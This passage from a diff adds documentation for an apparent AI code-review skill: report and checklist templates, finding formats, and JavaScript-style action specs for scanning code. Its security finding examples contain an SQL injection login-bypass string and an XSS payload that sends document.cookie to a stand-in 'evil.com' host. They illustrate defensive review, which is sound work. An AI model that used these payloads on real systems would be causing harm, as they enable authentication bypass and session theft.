**Current Code**:
\`\`\`typescript
const orders = await Order.findAll();
for (const order of orders) {
const user = await User.findById(order.userId);
order.userName = user.name;
}
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Batch query all users at once
const orders = await Order.findAll();
const userIds = orders.map(o => o.userId);
const users = await User.findByIds(userIds);
// Create lookup map for O(1) access
const userMap = new Map(users.map(u => [u.id, u]));
// Enrich orders with user data
for (const order of orders) {
order.userName = userMap.get(order.userId)?.name;
}
\`\`\`
**Impact**: Reduces database queries from N+1 to 2, significantly improving performance for large datasets.
---
```
## Example: Missing Documentation
```markdown
### 🟡 [BP-003] Missing Documentation
**File**: `src/services/PaymentService.ts:23`
**Category**: Maintainability
**Issue**: Exported class lacks documentation, making it difficult for other developers to understand its purpose and usage.
**Current Code**:
\`\`\`typescript
export class PaymentService {
async processPayment(orderId: string, amount: number) {
// implementation
}
}
\`\`\`
**Recommended Fix**:
\`\`\`typescript
/**
* Service for processing payment transactions
*
* Handles payment processing, refunds, and transaction logging.
* Integrates with Stripe payment gateway.
*
* @example
* const paymentService = new PaymentService();
* const result = await paymentService.processPayment('order-123', 99.99);
*/
export class PaymentService {
/**
* Process a payment for an order
*
* @param orderId - Unique order identifier
* @param amount - Payment amount in USD
* @returns Payment confirmation with transaction ID
* @throws {PaymentError} If payment processing fails
*/
async processPayment(orderId: string, amount: number) {
// implementation
}
}
\`\`\`
**Impact**: Improves code discoverability and reduces onboarding time for new developers.
---
```
## Example: Memory Leak
```markdown
### 🟠 [BP-004] Potential Memory Leak
**File**: `src/components/Chat.tsx:56`
**Category**: Performance
**Issue**: WebSocket event listener added without cleanup, causing memory leaks when component unmounts.
**Current Code**:
\`\`\`tsx
useEffect(() => {
socket.on('message', handleMessage);
}, []);
\`\`\`
**Recommended Fix**:
\`\`\`tsx
useEffect(() => {
socket.on('message', handleMessage);
// Cleanup on unmount
return () => {
socket.off('message', handleMessage);
};
}, []);
\`\`\`
**Impact**: Prevents memory leaks and improves application stability in long-running sessions.
---
```
## Severity Guidelines
### High
- Major performance impact (N+1 queries, O(n²) algorithms)
- Critical maintainability issues (complexity > 15)
- Missing error handling in critical paths
### Medium
- Moderate performance impact
- Code quality issues (complexity 11-15, duplication)
- Missing tests for important features
### Low
- Minor style violations
- Missing documentation
- Low-impact dead code


@@ -1,316 +0,0 @@
# Report Template
## Main Report Structure (REPORT.md)
```markdown
# Code Review Report
**Generated**: {timestamp}
**Scope**: {scope}
**Files Reviewed**: {total_files}
**Total Findings**: {total_findings}
---
## 📊 Executive Summary
### Overall Assessment
{Brief 2-3 paragraph assessment of code health}
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
{Risk assessment based on findings severity and count}
### Key Statistics
| Metric | Value | Status |
|--------|-------|--------|
| Total Files | {count} | - |
| Files with Issues | {count} | {percentage}% |
| Critical Findings | {count} | {icon} |
| High Findings | {count} | {icon} |
| Medium Findings | {count} | {icon} |
| Low Findings | {count} | {icon} |
### Category Breakdown
| Category | Count | Percentage |
|----------|-------|------------|
| Security | {count} | {percentage}% |
| Code Quality | {count} | {percentage}% |
| Performance | {count} | {percentage}% |
| Maintainability | {count} | {percentage}% |
---
## 🎯 Quality Scores
### Security Score: {score}/100
{Assessment and key issues}
### Code Quality Score: {score}/100
{Assessment and key issues}
### Performance Score: {score}/100
{Assessment and key issues}
### Maintainability Score: {score}/100
{Assessment and key issues}
### Overall Score: {score}/100
**Grade**: {A|B|C|D|F}
---
## 🔴 Critical Findings (Requires Immediate Action)
{List all critical findings using security-finding.md template}
---
## 🟠 High Priority Findings
{List all high findings}
---
## 🟡 Medium Priority Findings
{List all medium findings}
---
## 🟢 Low Priority Findings
{List all low findings}
---
## 📋 Action Plan
### Immediate (Within 24 hours)
1. {Critical issue 1}
2. {Critical issue 2}
3. {Critical issue 3}
### Short-term (Within 1 week)
1. {High priority issue 1}
2. {High priority issue 2}
...
### Medium-term (Within 1 month)
1. {Medium priority issue 1}
2. {Medium priority issue 2}
...
### Long-term (Within 3 months)
1. {Low priority issue 1}
2. {Improvement initiative 1}
...
---
## 📊 Metrics Dashboard
### Code Health Trends
{If historical data available, show trends}
### File Hotspots
Top files with most issues:
1. `{file-path}` - {count} issues ({severity breakdown})
2. `{file-path}` - {count} issues
...
### Technology Breakdown
Issues by language/framework:
- TypeScript: {count} issues
- Python: {count} issues
...
---
## ✅ Compliance Status
### PCI DSS
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
- **Affecting Findings**: {list}
### HIPAA
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
- **Affecting Findings**: {list}
### GDPR
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
- **Affecting Findings**: {list}
---
## 📚 Appendix
### A. Review Configuration
\`\`\`json
{review-config}
\`\`\`
### B. Tools and Versions
- Code Reviewer Skill: v1.0.0
- Security Rules: OWASP Top 10 2021, CWE Top 25
- Languages Analyzed: {list}
### C. References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- {additional references}
### D. Full Findings Index
{Links to detailed finding JSONs}
```
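The per-category scores and letter grade in the template above can be derived from severity-weighted penalties; the weights and thresholds below are illustrative assumptions, not part of the template:

```javascript
// Illustrative scoring: deduct a per-severity penalty from 100
const PENALTY = { critical: 15, high: 7, medium: 3, low: 1 };

function categoryScore(findings) {
  const penalty = findings.reduce((sum, f) => sum + (PENALTY[f.severity] || 0), 0);
  return Math.max(0, 100 - penalty);
}

function grade(score) {
  return score >= 90 ? 'A' : score >= 80 ? 'B' : score >= 70 ? 'C' : score >= 60 ? 'D' : 'F';
}
```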
---
## Fix Checklist Template (FIX-CHECKLIST.md)
```markdown
# Code Review Fix Checklist
**Generated**: {timestamp}
**Total Items**: {count}
---
## 🔴 Critical Issues (Fix Immediately)
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
- Effort: 1 hour
- Priority: P0
- Assignee: ___________
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
- Effort: 30 minutes
- Priority: P0
- Assignee: ___________
---
## 🟠 High Priority Issues (Fix This Week)
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
- Effort: 2 hours
- Priority: P1
- Assignee: ___________
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
- Effort: 1 hour
- Priority: P1
- Assignee: ___________
---
## 🟡 Medium Priority Issues (Fix This Month)
{List medium priority items}
---
## 🟢 Low Priority Issues (Fix Next Release)
{List low priority items}
---
## Progress Tracking
**Overall Progress**: {completed}/{total} ({percentage}%)
- Critical: {completed}/{total}
- High: {completed}/{total}
- Medium: {completed}/{total}
- Low: {completed}/{total}
**Estimated Total Effort**: {hours} hours
**Estimated Completion**: {date}
```
---
## Summary JSON Template (summary.json)
```json
{
"report_date": "2024-01-15T12:00:00Z",
"scope": "src/**/*",
"statistics": {
"total_files": 247,
"files_with_issues": 89,
"total_findings": 69,
"by_severity": {
"critical": 3,
"high": 13,
"medium": 30,
"low": 23
},
"by_category": {
"security": 24,
"code_quality": 18,
"performance": 12,
"maintainability": 15
}
},
"scores": {
"security": 68,
"code_quality": 75,
"performance": 82,
"maintainability": 70,
"overall": 74
},
"grade": "C",
"risk_level": "MEDIUM",
"action_required": true,
"compliance": {
"pci_dss": {
"status": "NON_COMPLIANT",
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
},
"hipaa": {
"status": "NON_COMPLIANT",
"affecting_findings": ["SEC-005", "SEC-009"]
},
"gdpr": {
"status": "PARTIAL",
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
}
},
"top_issues": [
{
"id": "SEC-001",
"type": "sql-injection",
"severity": "critical",
"file": "src/auth/user-service.ts",
"line": 145
}
],
"hotspots": [
{
"file": "src/auth/user-service.ts",
"issues": 5,
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
}
],
"effort_estimate": {
"critical": 4.5,
"high": 18,
"medium": 35,
"low": 12,
"total_hours": 69.5
}
}
```
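A sketch of how the `statistics` block above might be rolled up from a flat findings array (field names follow the template; the helper itself is an assumption):

```javascript
// Roll a flat findings list up into by_severity / by_category counts
function summarize(findings) {
  const bySeverity = { critical: 0, high: 0, medium: 0, low: 0 };
  const byCategory = {};
  for (const f of findings) {
    if (f.severity in bySeverity) bySeverity[f.severity]++;
    byCategory[f.category] = (byCategory[f.category] || 0) + 1;
  }
  return { total_findings: findings.length, by_severity: bySeverity, by_category: byCategory };
}
```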


@@ -1,161 +0,0 @@
# Security Finding Template
Use this template for documenting security vulnerabilities.
## Finding Structure
```json
{
"id": "SEC-{number}",
"type": "{vulnerability-type}",
"severity": "{critical|high|medium|low}",
"file": "{file-path}",
"line": {line-number},
"column": {column-number},
"code": "{vulnerable-code-snippet}",
"message": "{clear-description-of-issue}",
"cwe": "CWE-{number}",
"owasp": "A{number}:2021 - {category}",
"recommendation": {
"description": "{how-to-fix}",
"fix_example": "{corrected-code}"
},
"references": [
"https://...",
"https://..."
]
}
```
## Markdown Template
```markdown
### 🔴 [SEC-{number}] {Vulnerability Title}
**File**: `{file-path}:{line}`
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
**Vulnerable Code**:
\`\`\`{language}
{vulnerable-code-snippet}
\`\`\`
**Issue**: {Detailed explanation of the vulnerability and potential impact}
**Attack Example** (if applicable):
\`\`\`
{example-attack-payload}
Result: {what-happens}
Effect: {security-impact}
\`\`\`
**Recommended Fix**:
\`\`\`{language}
{corrected-code-with-comments}
\`\`\`
**References**:
- [{reference-title}]({url})
- [{reference-title}]({url})
---
```
## Severity Icon Mapping
- Critical: 🔴
- High: 🟠
- Medium: 🟡
- Low: 🟢
## Example: SQL Injection Finding
```markdown
### 🔴 [SEC-001] SQL Injection in User Authentication
**File**: `src/auth/user-service.ts:145`
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
**Vulnerable Code**:
\`\`\`typescript
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
const user = await db.execute(query);
\`\`\`
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
**Attack Example**:
\`\`\`
username: ' OR '1'='1' --
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
Effect: Bypasses authentication, returns all users
\`\`\`
**Recommended Fix**:
\`\`\`typescript
// Use parameterized queries
const query = 'SELECT * FROM users WHERE username = ?';
const user = await db.execute(query, [username]);
// Or use ORM
const user = await User.findOne({ where: { username } });
\`\`\`
**References**:
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
---
```
## Example: XSS Finding
```markdown
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
**File**: `src/components/CommentList.tsx:89`
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
**Vulnerable Code**:
\`\`\`tsx
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
\`\`\`
**Issue**: User-generated content rendered without sanitization, allowing script injection.
**Attack Example**:
\`\`\`
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
Effect: Steals user session cookies
\`\`\`
**Recommended Fix**:
\`\`\`tsx
import DOMPurify from 'dompurify';
// Sanitize HTML before rendering
<div dangerouslySetInnerHTML={{
__html: DOMPurify.sanitize(comment.body)
}} />
// Or use text content (if HTML not needed)
<div>{comment.body}</div>
\`\`\`
**References**:
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
---
```
## Compliance Mapping Template
When finding affects compliance:
```markdown
**Compliance Impact**:
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
- **HIPAA**: Technical Safeguards - Access Control
- **GDPR**: Article 32 (Security of processing)
```


@@ -0,0 +1,170 @@
---
name: review-code
description: Multi-dimensional code review with structured reports. Analyzes correctness, readability, performance, security, testing, and architecture. Triggers on "review code", "code review", "审查代码", "代码审查".
allowed-tools: Task, AskUserQuestion, Read, Write, Glob, Grep, Bash, mcp__ace-tool__search_context, mcp__ide__getDiagnostics
---
# Review Code
Multi-dimensional code review skill that analyzes code across 6 key dimensions and generates structured review reports with actionable recommendations.
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification Study (mandatory prerequisite) │
│ → Read specs/review-dimensions.md │
│ → Understand review dimensions and issue classification │
└───────────────┬─────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ Orchestrator (state-driven decisions) │
│ → read state → select review action → execute → update state │
└───────────────┬─────────────────────────────────────────────────┘
┌───────────┼───────────┬───────────┬───────────┐
↓ ↓ ↓ ↓ ↓
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ Collect │ │ Quick │ │ Deep │ │ Report │ │Complete │
│ Context │ │ Scan │ │ Review │ │ Generate│ │ │
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
↓ ↓ ↓ ↓
┌─────────────────────────────────────────────────────────────────┐
│ Review Dimensions │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │Correctness│ │Readability│ │Performance│ │ Security │ │
│ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │
│ ┌──────────┐ ┌──────────┐ │
│ │ Testing │ │Architecture│ │
│ └──────────┘ └──────────┘ │
└─────────────────────────────────────────────────────────────────┘
```
## Key Design Principles
1. **Multi-dimensional review**: covers six dimensions: correctness, readability, performance, security, test coverage, and architectural consistency
2. **Layered execution**: a quick scan identifies high-risk areas, then a deep review focuses on key issues
3. **Structured reports**: findings grouped by severity, with file locations and fix recommendations
4. **State-driven**: autonomous mode that dynamically selects the next action based on review progress
---
## ⚠️ Mandatory Prerequisites
> **⛔ Do not skip**: Before performing any review action, you **must** read the following documents in full.
### Specification Documents (required reading)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/review-dimensions.md](specs/review-dimensions.md) | Review dimension definitions and checkpoints | **P0 - highest** |
| [specs/issue-classification.md](specs/issue-classification.md) | Issue classification and severity standards | **P0 - highest** |
| [specs/quality-standards.md](specs/quality-standards.md) | Review quality standards | P1 |
### Template Files (read before generating output)
| Document | Purpose |
|----------|---------|
| [templates/review-report.md](templates/review-report.md) | Review report template |
| [templates/issue-template.md](templates/issue-template.md) | Issue record template |
---
## Execution Flow
```
┌─────────────────────────────────────────────────────────────────┐
│ Phase 0: Specification Study (mandatory - do not skip) │
│ → Read: specs/review-dimensions.md │
│ → Read: specs/issue-classification.md │
│ → Understand review standards and issue classification │
├─────────────────────────────────────────────────────────────────┤
│ Action: collect-context │
│ → Collect target files/directories │
│ → Identify tech stack and language │
│ → Output: state.context (files, language, framework) │
├─────────────────────────────────────────────────────────────────┤
│ Action: quick-scan │
│ → Quick-scan the overall structure │
│ → Identify high-risk areas │
│ → Output: state.risk_areas, state.scan_summary │
├─────────────────────────────────────────────────────────────────┤
│ Action: deep-review (per dimension) │
│ → Review each dimension in depth │
│ → Record discovered issues │
│ → Output: state.findings[] │
├─────────────────────────────────────────────────────────────────┤
│ Action: generate-report │
│ → Aggregate all findings │
│ → Generate a structured report │
│ → Output: review-report.md │
├─────────────────────────────────────────────────────────────────┤
│ Action: complete │
│ → Save the final state │
│ → Print the review summary │
└─────────────────────────────────────────────────────────────────┘
```
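The state-driven loop above can be sketched as a simple dispatch on the current state (the action names match this skill; the guard conditions are a minimal assumption):

```javascript
// Minimal orchestrator sketch: pick the next action from the current state
function nextAction(state) {
  if (!state.context) return 'collect-context';
  if (!state.scan_completed) return 'quick-scan';
  if ((state.reviewed_dimensions || []).length < 6) return 'deep-review';
  if (!state.report_generated) return 'generate-report';
  return 'complete';
}
```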
## Directory Setup
```javascript
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
const workDir = `.workflow/.scratchpad/review-code-${timestamp}`;
Bash(`mkdir -p "${workDir}"`);
Bash(`mkdir -p "${workDir}/findings"`);
```
## Output Structure
```
.workflow/.scratchpad/review-code-{timestamp}/
├── state.json # review state
├── context.json # target context
├── findings/ # per-dimension findings
│ ├── correctness.json
│ ├── readability.json
│ ├── performance.json
│ ├── security.json
│ ├── testing.json
│ └── architecture.json
└── review-report.md # final review report
```
## Review Dimensions
| Dimension | Focus Areas | Key Checks |
|-----------|-------------|------------|
| **Correctness** | Logical correctness | Boundary conditions, error handling, null checks |
| **Readability** | Code readability | Naming conventions, function length, comment quality |
| **Performance** | Efficiency | Algorithmic complexity, I/O optimization, resource usage |
| **Security** | Security posture | Injection risks, sensitive data, access control |
| **Testing** | Test coverage | Test sufficiency, boundary coverage, maintainability |
| **Architecture** | Architectural consistency | Design patterns, layering, dependency management |
## Issue Severity Levels
| Level | Prefix | Description | Action Required |
|-------|--------|-------------|-----------------|
| **Critical** | [C] | Blocking issue; must be fixed immediately | Must fix before merge |
| **High** | [H] | Important issue; needs fixing | Should fix |
| **Medium** | [M] | Suggested improvement | Consider fixing |
| **Low** | [L] | Optional optimization | Nice to have |
| **Info** | [I] | Informational suggestion | For reference |
## Reference Documents
| Document | Purpose |
|----------|---------|
| [phases/orchestrator.md](phases/orchestrator.md) | Review orchestrator |
| [phases/state-schema.md](phases/state-schema.md) | State schema definition |
| [phases/actions/action-collect-context.md](phases/actions/action-collect-context.md) | Collect context |
| [phases/actions/action-quick-scan.md](phases/actions/action-quick-scan.md) | Quick scan |
| [phases/actions/action-deep-review.md](phases/actions/action-deep-review.md) | Deep review |
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | Generate report |
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | Complete review |
| [specs/review-dimensions.md](specs/review-dimensions.md) | Review dimension spec |
| [specs/issue-classification.md](specs/issue-classification.md) | Issue classification standards |
| [specs/quality-standards.md](specs/quality-standards.md) | Quality standards |
| [templates/review-report.md](templates/review-report.md) | Report template |
| [templates/issue-template.md](templates/issue-template.md) | Issue template |


@@ -0,0 +1,139 @@
# Action: Collect Context
Collect context information about the review target.
## Purpose
Before the review starts, gather basic information about the target code:
- Determine the review scope (files/directories)
- Identify the programming language and framework
- Measure code size
## Preconditions
- [ ] state.status === 'pending' || state.context === null
## Execution
```javascript
async function execute(state, workDir) {
// 1. Ask the user for the review target
const input = await AskUserQuestion({
questions: [{
question: "Specify the code path to review:",
header: "Review Target",
multiSelect: false,
options: [
{ label: "Current directory", description: "Review all code under the current working directory" },
{ label: "src/", description: "Review the src/ directory" },
{ label: "Custom path", description: "Enter a custom path" }
]
}]
});
const targetPath = input["Review Target"] === "Custom path"
? input["Other"]
: input["Review Target"] === "Current directory" ? "." : "src/";
// 2. Collect the file list
const files = Glob(`${targetPath}/**/*.{ts,tsx,js,jsx,py,java,go,rs,cpp,c,cs}`);
// 3. Detect the primary language
const languageCounts = {};
files.forEach(file => {
const ext = file.split('.').pop();
const langMap = {
'ts': 'TypeScript', 'tsx': 'TypeScript',
'js': 'JavaScript', 'jsx': 'JavaScript',
'py': 'Python',
'java': 'Java',
'go': 'Go',
'rs': 'Rust',
'cpp': 'C++', 'c': 'C',
'cs': 'C#'
};
const lang = langMap[ext] || 'Unknown';
languageCounts[lang] = (languageCounts[lang] || 0) + 1;
});
const primaryLanguage = Object.entries(languageCounts)
.sort((a, b) => b[1] - a[1])[0]?.[0] || 'Unknown';
// 4. Count lines of code
let totalLines = 0;
for (const file of files.slice(0, 100)) { // limit to the first 100 files
try {
const content = Read(file);
totalLines += content.split('\n').length;
} catch (e) {}
}
// 5. Detect framework (read package.json directly; the code-file glob above won't include it)
let framework = null;
try {
const pkg = JSON.parse(Read('package.json'));
if (pkg.dependencies?.react) framework = 'React';
else if (pkg.dependencies?.vue) framework = 'Vue';
else if (pkg.dependencies?.angular) framework = 'Angular';
else if (pkg.dependencies?.express) framework = 'Express';
else if (pkg.dependencies?.next) framework = 'Next.js';
} catch (e) { /* no package.json; leave framework as null */ }
// 6. Build the context object
const context = {
target_path: targetPath,
files: files.slice(0, 200), // cap at 200 files
language: primaryLanguage,
framework: framework,
total_lines: totalLines,
file_count: files.length
};
// 7. Save the context
Write(`${workDir}/context.json`, JSON.stringify(context, null, 2));
return {
stateUpdates: {
status: 'running',
context: context
}
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'running',
context: {
target_path: targetPath,
files: fileList,
language: primaryLanguage,
framework: detectedFramework,
total_lines: totalLines,
file_count: fileCount
}
}
};
```
## Output
- **File**: `context.json`
- **Location**: `${workDir}/context.json`
- **Format**: JSON
## Error Handling
| Error Type | Recovery |
|------------|----------|
| Path does not exist | Prompt the user to re-enter |
| No code files found | Return an error and abort the review |
| Read permission issue | Skip the file and log a warning |
## Next Actions
- On success: action-quick-scan
- On failure: action-abort


@@ -0,0 +1,115 @@
# Action: Complete
Finish the review and save the final state.
## Purpose
Wrap up the code review flow:
- Save the final state
- Print a review summary
- Provide the report path
## Preconditions
- [ ] state.status === 'running'
- [ ] state.report_generated === true
## Execution
```javascript
async function execute(state, workDir) {
// 1. Compute the review duration
const duration = Date.now() - new Date(state.started_at).getTime();
const durationMinutes = Math.round(duration / 60000);
// 2. Build the final summary
const summary = {
...state.summary,
review_duration_ms: duration,
completed_at: new Date().toISOString()
};
// 3. Save the final state
const finalState = {
...state,
status: 'completed',
completed_at: summary.completed_at,
summary: summary
};
Write(`${workDir}/state.json`, JSON.stringify(finalState, null, 2));
// 4. Print the summary
console.log('========================================');
console.log(' CODE REVIEW COMPLETED');
console.log('========================================');
console.log('');
console.log(`📁 Target: ${state.context.target_path}`);
console.log(`📄 Files: ${state.context.file_count}`);
console.log(`📝 Lines: ${state.context.total_lines}`);
console.log('');
console.log('--- Issue Statistics ---');
console.log(`🔴 Critical: ${summary.critical}`);
console.log(`🟠 High: ${summary.high}`);
console.log(`🟡 Medium: ${summary.medium}`);
console.log(`🔵 Low: ${summary.low}`);
console.log(`⚪ Info: ${summary.info}`);
console.log(`📊 Total: ${summary.total_issues}`);
console.log('');
console.log(`⏱️ Duration: ${durationMinutes} minutes`);
console.log('');
console.log(`📋 Report: ${state.report_path}`);
console.log('========================================');
// 5. Return the state updates
return {
stateUpdates: {
status: 'completed',
completed_at: summary.completed_at,
summary: summary
}
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'completed',
completed_at: new Date().toISOString(),
summary: {
total_issues: state.summary.total_issues,
critical: state.summary.critical,
high: state.summary.high,
medium: state.summary.medium,
low: state.summary.low,
info: state.summary.info,
review_duration_ms: duration
}
}
};
```
## Output
- **Console**: review completion summary
- **State**: final state saved to `state.json`
## Error Handling
| Error Type | Recovery |
|------------|----------|
| State save failure | Fall back to console output |
## Next Actions
- None (terminal state)
## Post-Completion
The user can:
1. View the full report: `cat ${workDir}/review-report.md`
2. Inspect finding details: `cat ${workDir}/findings/*.json`
3. Export the report to another location


@@ -0,0 +1,302 @@
# Action: Deep Review
Perform an in-depth review of one dimension of code quality.
## Purpose
Review a single dimension in depth:
- Check file by file
- Record discovered issues
- Provide concrete fix recommendations
## Preconditions
- [ ] state.status === 'running'
- [ ] state.scan_completed === true
- [ ] At least one dimension remains unreviewed
## Dimension Focus Areas
### Correctness
- Logic errors and boundary conditions
- Null/undefined handling
- Completeness of error handling
- Type safety
- Resource leaks
### Readability
- Naming conventions
- Function length and complexity
- Code duplication
- Comment quality
- Code organization
### Performance
- Algorithmic complexity
- Unnecessary computation
- Memory usage
- I/O efficiency
- Caching strategy
### Security
- Injection risks (SQL, XSS, command)
- Authentication and authorization
- Sensitive data handling
- Cryptography usage
- Dependency security
### Testing
- Test coverage
- Boundary condition tests
- Error path tests
- Test maintainability
- Mock usage
### Architecture
- Layered structure
- Dependency direction
- Single responsibility
- Interface design
- Extensibility
## Execution
```javascript
async function execute(state, workDir, currentDimension) {
const context = state.context;
const dimension = currentDimension;
const findings = [];
// Load the rule configuration from an external JSON file
const rulesConfig = loadRulesConfig(dimension, workDir);
const rules = rulesConfig.rules || [];
const prefix = rulesConfig.prefix || getDimensionPrefix(dimension);
// Prioritize the high-risk areas identified by the quick scan
const filesToReview = state.scan_summary?.risk_areas
?.map(r => r.file)
?.filter(f => context.files.includes(f)) || context.files;
const filesToCheck = [...new Set([
...filesToReview.slice(0, 20),
...context.files.slice(0, 30)
])].slice(0, 50); // at most 50 files
let findingCounter = 1;
for (const file of filesToCheck) {
try {
const content = Read(file);
const lines = content.split('\n');
// Apply the rules from the external rules file
for (const rule of rules) {
const matches = detectByPattern(content, lines, file, rule);
for (const match of matches) {
findings.push({
id: `${prefix}-${String(findingCounter++).padStart(3, '0')}`,
severity: rule.severity || match.severity,
dimension: dimension,
category: rule.category,
file: file,
line: match.line,
code_snippet: match.snippet,
description: rule.description,
recommendation: rule.recommendation,
fix_example: rule.fixExample
});
}
}
} catch (e) {
// Skip files that cannot be read
}
}
// Save this dimension's findings
Write(`${workDir}/findings/${dimension}.json`, JSON.stringify(findings, null, 2));
return {
stateUpdates: {
reviewed_dimensions: [...(state.reviewed_dimensions || []), dimension],
current_dimension: null,
[`findings.${dimension}`]: findings
}
};
}
/**
* Load the rule configuration from an external JSON file.
* Rule files live at specs/rules/{dimension}-rules.json
* @param {string} dimension - Dimension name (correctness, security, etc.)
* @param {string} workDir - Working directory (used for logging)
* @returns {object} Rule configuration containing a rules array and a prefix
*/
function loadRulesConfig(dimension, workDir) {
// Rules file path, relative to the skill directory
const rulesPath = `specs/rules/${dimension}-rules.json`;
try {
const rulesFile = Read(rulesPath);
const rulesConfig = JSON.parse(rulesFile);
return rulesConfig;
} catch (e) {
console.warn(`Failed to load rules for ${dimension}: ${e.message}`);
// Return an empty rule config to stay backward compatible
return { rules: [], prefix: getDimensionPrefix(dimension) };
}
}
/**
* Detect code issues according to the rule's patternType.
* Supported patternType values: regex, includes
* @param {string} content - File content
* @param {string[]} lines - Content split into lines
* @param {string} file - File path
* @param {object} rule - Rule configuration object
* @returns {Array} Array of match results
*/
function detectByPattern(content, lines, file, rule) {
const matches = [];
const { pattern, patternType, negativePatterns, caseInsensitive } = rule;
if (!pattern) return matches;
switch (patternType) {
case 'regex':
return detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive);
case 'includes':
return detectByIncludes(content, lines, pattern, negativePatterns);
default:
// Default to includes matching
return detectByIncludes(content, lines, pattern, negativePatterns);
}
}
/**
* Detect code issues with a regular expression.
* @param {string} content - Full file content
* @param {string[]} lines - Content split into lines
* @param {string} pattern - Regular expression pattern
* @param {string[]} negativePatterns - Exclusion patterns
* @param {boolean} caseInsensitive - Whether to ignore case
* @returns {Array} Array of match results
*/
function detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive) {
const matches = [];
const flags = caseInsensitive ? 'gi' : 'g';
try {
const regex = new RegExp(pattern, flags);
let match;
while ((match = regex.exec(content)) !== null) {
const lineNum = content.substring(0, match.index).split('\n').length;
const lineContent = lines[lineNum - 1] || '';
// Check exclusion patterns - skip the line if it matches any of them
if (negativePatterns && negativePatterns.length > 0) {
const shouldExclude = negativePatterns.some(np => {
try {
return new RegExp(np).test(lineContent);
} catch {
return lineContent.includes(np);
}
});
if (shouldExclude) continue;
}
matches.push({
line: lineNum,
snippet: lineContent.trim().substring(0, 100),
matchedText: match[0]
});
}
} catch (e) {
console.warn(`Invalid regex pattern: ${pattern}`);
}
return matches;
}
/**
* Detect code issues via substring matching.
* @param {string} content - Full file content (unused, kept for interface consistency)
* @param {string[]} lines - Content split into lines
* @param {string} pattern - Substring to look for
* @param {string[]} negativePatterns - Exclusion patterns
* @returns {Array} Array of match results
*/
function detectByIncludes(content, lines, pattern, negativePatterns) {
const matches = [];
lines.forEach((line, i) => {
if (line.includes(pattern)) {
// Check exclusion patterns - skip the line if it contains any of them
if (negativePatterns && negativePatterns.length > 0) {
const shouldExclude = negativePatterns.some(np => line.includes(np));
if (shouldExclude) return;
}
matches.push({
line: i + 1,
snippet: line.trim().substring(0, 100),
matchedText: pattern
});
}
});
return matches;
}
/**
* Get the dimension prefix (fallback when the rules file is missing).
* @param {string} dimension - Dimension name
* @returns {string} Short finding-ID prefix
*/
function getDimensionPrefix(dimension) {
const prefixes = {
correctness: 'CORR',
readability: 'READ',
performance: 'PERF',
security: 'SEC',
testing: 'TEST',
architecture: 'ARCH'
};
return prefixes[dimension] || 'MISC';
}
```
## State Updates
```javascript
return {
stateUpdates: {
reviewed_dimensions: [...state.reviewed_dimensions, currentDimension],
current_dimension: null,
findings: {
...state.findings,
[currentDimension]: newFindings
}
}
};
```
## Output
- **File**: `findings/{dimension}.json`
- **Location**: `${workDir}/findings/`
- **Format**: JSON array of Finding objects
## Error Handling
| Error Type | Recovery |
|------------|----------|
| File read failure | Skip the file and log a warning |
| Rule execution error | Skip the rule and continue with the rest |
## Next Actions
- Dimensions remain unreviewed: run action-deep-review again
- All dimensions reviewed: action-generate-report


@@ -0,0 +1,263 @@
# Action: Generate Report
Aggregate all findings and generate a structured review report.
## Purpose
Produce the final code review report:
- Aggregate findings from all dimensions
- Sort by severity
- Provide summary statistics
- Output a Markdown-formatted report
## Preconditions
- [ ] state.status === 'running'
- [ ] All dimensions reviewed (reviewed_dimensions.length === 6)
## Execution
```javascript
async function execute(state, workDir) {
const context = state.context;
const findings = state.findings;
// 1. Aggregate all findings
const allFindings = [
...findings.correctness,
...findings.readability,
...findings.performance,
...findings.security,
...findings.testing,
...findings.architecture
];
// 2. Sort by severity
const severityOrder = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
allFindings.sort((a, b) => severityOrder[a.severity] - severityOrder[b.severity]);
// 3. Compute statistics
const stats = {
